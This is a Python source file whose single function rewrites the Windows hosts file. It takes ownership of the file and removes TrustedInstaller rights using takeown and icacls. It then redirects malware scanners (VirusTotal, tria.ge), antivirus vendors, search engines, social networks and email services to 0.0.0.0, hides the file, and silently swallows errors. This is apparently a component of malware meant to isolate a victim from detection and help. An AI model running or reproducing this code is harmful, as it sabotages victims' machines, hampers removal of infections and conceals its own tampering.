import os
import ctypes

def blocksites():
    try:
        hosts_path = r"C:\Windows\System32\drivers\etc\hosts"
        if not os.path.exists(hosts_path):
            open(hosts_path, 'w').close()
        ctypes.windll.shell32.IsUserAnAdmin()
        os.system(f'takeown /f {hosts_path}')
        os.system(f'icacls {hosts_path} /remove "NT AUTHORITY\\TrustedInstaller"')
        with open(hosts_path, "a") as hosts_file:
            hosts_file.write("\n0.0.0.0 virustotal.com\n")
            hosts_file.write("0.0.0.0 www.virustotal.com\n")
            hosts_file.write("0.0.0.0 tria.ge\n")
            hosts_file.write("0.0.0.0 www.tria.ge\n")
            hosts_file.write("0.0.0.0 notron.com\n")
            hosts_file.write("0.0.0.0 www.notron.com\n")
            hosts_file.write("0.0.0.0 mcafee.com\n")
            hosts_file.write("0.0.0.0 www.mcafee.com\n")
            hosts_file.write("0.0.0.0 x.com\n")
            hosts_file.write("0.0.0.0 www.x.com\n")
            hosts_file.write("0.0.0.0 doxbin.com\n")
            hosts_file.write("0.0.0.0 www.doxbin.com\n")
            hosts_file.write("0.0.0.0 google.com\n")
            hosts_file.write("0.0.0.0 www.google.com\n")
            hosts_file.write("0.0.0.0 duckduckgo.com\n")
            hosts_file.write("0.0.0.0 www.duckduckgo.com\n")
            hosts_file.write("0.0.0.0 bing.com\n")
            hosts_file.write("0.0.0.0 www.bing.com\n")
            hosts_file.write("0.0.0.0 github.com\n")
            hosts_file.write("0.0.0.0 www.github.com\n")
            hosts_file.write("0.0.0.0 yandex.com\n")
            hosts_file.write("0.0.0.0 www.yandex.com\n")
            hosts_file.write("0.0.0.0 ask.com\n")
            hosts_file.write("0.0.0.0 www.ask.com\n")
            hosts_file.write("0.0.0.0 aol.com\n")
            hosts_file.write("0.0.0.0 www.aol.com\n")
            hosts_file.write("0.0.0.0 yahoo.com\n")
            hosts_file.write("0.0.0.0 www.yahoo.com\n")
            hosts_file.write("0.0.0.0 ecosia.org\n")
            hosts_file.write("0.0.0.0 www.ecosia.org\n")
            hosts_file.write("0.0.0.0 qwant.com\n")
            hosts_file.write("0.0.0.0 www.qwant.com\n")
            hosts_file.write("0.0.0.0 startpage.com\n")
            hosts_file.write("0.0.0.0 www.startpage.com\n")
            hosts_file.write("0.0.0.0 ixquick.com\n")
            hosts_file.write("0.0.0.0 www.ixquick.com\n")
            hosts_file.write("0.0.0.0 facebook.com\n")
            hosts_file.write("0.0.0.0 www.facebook.com\n")
            hosts_file.write("0.0.0.0 twitter.com\n")
            hosts_file.write("0.0.0.0 www.twitter.com\n")
            hosts_file.write("0.0.0.0 instagram.com\n")
            hosts_file.write("0.0.0.0 www.instagram.com\n")
            hosts_file.write("0.0.0.0 linkedin.com\n")
            hosts_file.write("0.0.0.0 www.linkedin.com\n")
            hosts_file.write("0.0.0.0 pinterest.com\n")
            hosts_file.write("0.0.0.0 www.pinterest.com\n")
            hosts_file.write("0.0.0.0 snapchat.com\n")
            hosts_file.write("0.0.0.0 www.snapchat.com\n")
            hosts_file.write("0.0.0.0 tiktok.com\n")
            hosts_file.write("0.0.0.0 www.tiktok.com\n")
            hosts_file.write("0.0.0.0 reddit.com\n")
            hosts_file.write("0.0.0.0 www.reddit.com\n")
            hosts_file.write("0.0.0.0 whatsapp.com\n")
            hosts_file.write("0.0.0.0 www.whatsapp.com\n")
            hosts_file.write("0.0.0.0 youtube.com\n")
            hosts_file.write("0.0.0.0 www.youtube.com\n")
            hosts_file.write("0.0.0.0 gmail.com\n")
            hosts_file.write("0.0.0.0 www.gmail.com\n")
            hosts_file.write("0.0.0.0 outlook.com\n")
            hosts_file.write("0.0.0.0 www.outlook.com\n")
            hosts_file.write("0.0.0.0 mail.yahoo.com\n")
            hosts_file.write("0.0.0.0 www.mail.yahoo.com\n")
            hosts_file.write("0.0.0.0 protonmail.com\n")
            hosts_file.write("0.0.0.0 www.protonmail.com\n")
            hosts_file.write("0.0.0.0 zoho.com\n")
            hosts_file.write("0.0.0.0 www.zoho.com\n")
            hosts_file.write("0.0.0.0 icloud.com\n")
            hosts_file.write("0.0.0.0 www.icloud.com\n")
        os.system(f'attrib +h {hosts_path}')
    except: pass